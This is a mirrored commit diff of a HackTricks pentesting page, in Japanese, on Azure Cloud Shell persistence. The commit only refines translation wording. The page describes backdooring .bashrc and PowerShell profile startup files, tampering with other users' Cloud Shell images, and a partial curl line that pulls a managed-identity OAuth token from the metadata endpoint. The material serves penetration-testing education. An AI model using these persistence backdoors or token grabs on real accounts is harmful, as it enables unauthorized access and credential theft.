gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-18 15:45:54 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-cloud/azure-security/az-persistence/az-cloud

Browse Source
This commit is contained in:
Translator
2025-05-14 13:51:36 +00:00
parent 9e8dde9013
commit f32a1f410c
1 changed files with 4 additions and 4 deletions
Download Patch File Download Diff File Expand all files Collapse all files

8
src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md
View File

@@ -4,9 +4,9 @@
## Cloud Shell Persistence
Azure Cloud Shellは、永続的なストレージと自動認証を備えたAzureリソースを管理するためのコマンドラインアクセスを提供します。攻撃者は、永続的なホームディレクトリにバックドアを配置することでこれを悪用できます
Azure Cloud Shellは、永続ストレージと自動認証を備えたAzureリソースを管理するためのコマンドラインアクセスを提供します。攻撃者は、永続的なホームディレクトリにバックドアを配置することでこれを悪用できます
* **Persistent Storage**: Azure Cloud ShellのホームディレクトリはAzureファイル共有にマウントされており、セッションが終了しても保持されます。
* **Persistent Storage**: Azure Cloud ShellのホームディレクトリはAzureファイル共有にマウントされており、セッションが終了してもそのまま保持されます。
* **Startup Scripts**: `.bashrc``config/PowerShell/Microsoft.PowerShell_profile.ps1`のようなファイルは、各セッションの開始時に自動的に実行され、クラウドシェルが起動する際に永続的な実行を可能にします。
Example backdoor in .bashrc:
@@ -21,9 +21,9 @@ curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?a
```
### Cloud Shell フィッシング
もし攻撃者がストレージアカウントに書き込み読み取りアクセス権を持つ他のユーザーの画像を見つけた場合、彼はその画像をダウンロードし、**bashPSバックドアを追加し**、再びストレージアカウントにアップロードすることができるので、次回ユーザーがシェルにアクセスすると、**コマンドが自動的に実行される**。
もし攻撃者がストレージアカウントに書き込みおよび読み取りアクセス権を持つ他のユーザーのイメージを見つけた場合、彼はそのイメージをダウンロードし、**bashおよびPSバックドアを追加し**、再びストレージアカウントにアップロードすることができるので、次回ユーザーがシェルにアクセスすると、**コマンドが自動的に実行される**。
- **画像をダウンロードし、バックドアを追加してアップロードする:**
- **イメージをダウンロードし、バックドアを追加してアップロードする:**
```bash
# Download image
mkdir /tmp/phishing_img